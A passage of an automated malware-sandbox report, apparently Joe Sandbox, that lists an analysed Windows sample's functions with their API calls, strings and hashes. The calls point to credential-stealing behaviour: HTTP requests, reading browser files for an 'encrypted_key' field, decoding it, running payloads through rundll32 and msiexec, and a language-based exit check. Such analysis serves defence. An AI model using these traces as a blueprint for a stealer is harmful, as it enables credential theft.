Instruction Fuzzy Hash: 47E11271D10508ABDB26EBA0DC91FEEB778AF54300F408159F11A6B191EF346A4ADF62

Function 00379010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0037906C

Strings

image/jpeg, xrefs: 00379136

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: 84234acd95bd0a292df5e3234f7d4f3ee3e95fe65fe207a505c4b7ed4656a44d
Instruction ID: 1401194cbb6f3135bf5deaeb3142482e45df9d7eba68266cf3064f61f5880279
Opcode Fuzzy Hash: 84234acd95bd0a292df5e3234f7d4f3ee3e95fe65fe207a505c4b7ed4656a44d
Instruction Fuzzy Hash: 56711171910208ABDB15EFE4DC89FEEB7B8FF58700F108508F616AB294DB389905DB61

Function 003717A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 003717C5
ExitProcess.KERNEL32 ref: 003717D1

Strings

block, xrefs: 003717B7

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 55c90394fd2a06acfe9ff5b17b8f4f835a3f0ef869526fb6507080b929ce9ec2
Instruction ID: 209f8184bb6a885d6cf6637d12a67c9a1b7b76fc503bc75e888a0fa4190848b7
Opcode Fuzzy Hash: 55c90394fd2a06acfe9ff5b17b8f4f835a3f0ef869526fb6507080b929ce9ec2
Instruction Fuzzy Hash: 8251B3B5A04209EFCB16DFA4C954BBE77B9BF45304F10C048E509BB240D778E94ADBA2

Function 00372E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

ShellExecuteEx.SHELL32(0000003C), ref: 003731C5
ShellExecuteEx.SHELL32(0000003C), ref: 0037335D
ShellExecuteEx.SHELL32(0000003C), ref: 003734EA

Strings

.dll, xrefs: 003731E5
C:\Windows\system32\rundll32.exe, xrefs: 00373332
<, xrefs: 00373490
/passive, xrefs: 0037345B
"" , xrefs: 0037309A
C:\Windows\system32\msiexec.exe, xrefs: 003734BF
/i ", xrefs: 003733E4
.msi, xrefs: 00373398

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: e9a4d972a558f5848dd777b16fbac92f8ff4d9eeb0b73c4d1ad60c0e4221d144
Instruction ID: 1f4f0d3ad82a2cfcb6517b26e8fe2faed83db4e6df032634a4d3cf4d59e15baf
Opcode Fuzzy Hash: e9a4d972a558f5848dd777b16fbac92f8ff4d9eeb0b73c4d1ad60c0e4221d144
Instruction Fuzzy Hash: C112037180050CAADB6AFBA0DC92FDE7778AF54300F508159F51A7A191EF382B4ADF52

Function 003752C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 00366280: InternetOpenA.WININET(00380DFE,00000001,00000000,00000000,00000000), ref: 003662E1
Part of subcall function 00366280: StrCmpCA.SHLWAPI(?,0114EBA8), ref: 00366303
Part of subcall function 00366280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00366335
Part of subcall function 00366280: HttpOpenRequestA.WININET(00000000,GET,?,0114DEE0,00000000,00000000,00400100,00000000), ref: 00366385
Part of subcall function 00366280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003663BF
Part of subcall function 00366280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003663D1

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375318
lstrlen.KERNEL32(00000000), ref: 0037532F

Part of subcall function 00378E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00375364
lstrlen.KERNEL32(00000000), ref: 00375383
lstrlen.KERNEL32(00000000), ref: 003753AE

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Strings

ERROR, xrefs: 0037546F
ERROR, xrefs: 003753B9
ERROR, xrefs: 003754A9
ERROR, xrefs: 00375432
ERROR, xrefs: 0037530A

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 47346b53ee47142eab171ebbedbe7345b63d94dfe1360cb43421b60aefdf6dc1
Instruction ID: 879b0fbbb951f39684b525ebeb9345c26e83a662bba58a7cae0c1c8e8cb062f8
Opcode Fuzzy Hash: 47346b53ee47142eab171ebbedbe7345b63d94dfe1360cb43421b60aefdf6dc1
Instruction Fuzzy Hash: 08511E70910648ABCB2AFF60CD92AEE7B78AF50301F50C018E41E6E591DF386B46DB52

Function 003712D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: e2ccf7134077871204d5487b87e858d6a523a7d51057b4d794970184817bb9b3
Instruction ID: c237f397eff25a3e20c572bd78ff440730b243b7bd0823acb0ea951a5db7bdd1
Opcode Fuzzy Hash: e2ccf7134077871204d5487b87e858d6a523a7d51057b4d794970184817bb9b3
Instruction Fuzzy Hash: 38C194B590020DABCB25EF60DC89FEE7778BBA4304F008599F50E6B141DB74AA85DF91

Function 00374280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00378DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378E0B

lstrcat.KERNEL32(?,00000000), ref: 003742EC
lstrcat.KERNEL32(?,0114E540), ref: 0037430B
lstrcat.KERNEL32(?,?), ref: 0037431F
lstrcat.KERNEL32(?,0114D428), ref: 00374333

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 00378D90: GetFileAttributesA.KERNEL32(00000000,?,00361B54,?,?,0038564C,?,?,00380E1F), ref: 00378D9F

Part of subcall function 00369CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00369D39

Part of subcall function 003699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003699EC
Part of subcall function 003699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00369A11
Part of subcall function 003699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00369A31
Part of subcall function 003699C0: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 00369A5A
Part of subcall function 003699C0: LocalFree.KERNEL32(0036148F), ref: 00369A90
Part of subcall function 003699C0: CloseHandle.KERNEL32(000000FF), ref: 00369A9A

Part of subcall function 003793C0: GlobalAlloc.KERNEL32(00000000,003743DD,003743DD), ref: 003793D3

StrStrA.SHLWAPI(?,0114E420), ref: 003743F3
GlobalFree.KERNEL32(?), ref: 00374512

Part of subcall function 00369AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N6,00000000,00000000), ref: 00369AEF
Part of subcall function 00369AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00364EEE,00000000,?), ref: 00369B01
Part of subcall function 00369AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N6,00000000,00000000), ref: 00369B2A
Part of subcall function 00369AC0: LocalFree.KERNEL32(?,?,?,?,00364EEE,00000000,?), ref: 00369B3F

lstrcat.KERNEL32(?,00000000), ref: 003744A3
StrCmpCA.SHLWAPI(?,003808D1), ref: 003744C0
lstrcat.KERNEL32(00000000,00000000), ref: 003744D2
lstrcat.KERNEL32(00000000,?), ref: 003744E5
lstrcat.KERNEL32(00000000,00380FB8), ref: 003744F4

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: ed0b0cdbca9fffa135e7887280838a1694ab81c472b65e35b256a58f2fdb8660
Instruction ID: 88571c57258836fb8fd322aff50e23c49111ea625d41d39885d30abd00dc08a1
Opcode Fuzzy Hash: ed0b0cdbca9fffa135e7887280838a1694ab81c472b65e35b256a58f2fdb8660
Instruction Fuzzy Hash: B4713976900208ABDB65EBA0DC45FEE737DAB99300F048598F609A7181DB38DB49DB51

Function 00376770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00376774
ExitProcess.KERNEL32 ref: 003767A5
ExitProcess.KERNEL32 ref: 003767AF
ExitProcess.KERNEL32 ref: 003767B9
ExitProcess.KERNEL32 ref: 003767C3
ExitProcess.KERNEL32 ref: 003767CD

Strings

*, xrefs: 0037678C

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 67c0034c2e7ca3e6a0723133a8538207bd40a04ffe898a13623b72b84c444b01
Instruction ID: f62fe51af8877b7b58d7b88a1bf3bffe78ba5b76b6b8d98075a371cacffffc9c
Opcode Fuzzy Hash: 67c0034c2e7ca3e6a0723133a8538207bd40a04ffe898a13623b72b84c444b01
Instruction Fuzzy Hash: 7CF05E30904249EFD3949FE0E91A77D7B74FB16703F040198E60996290D7744F42EB96

Function 003792E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

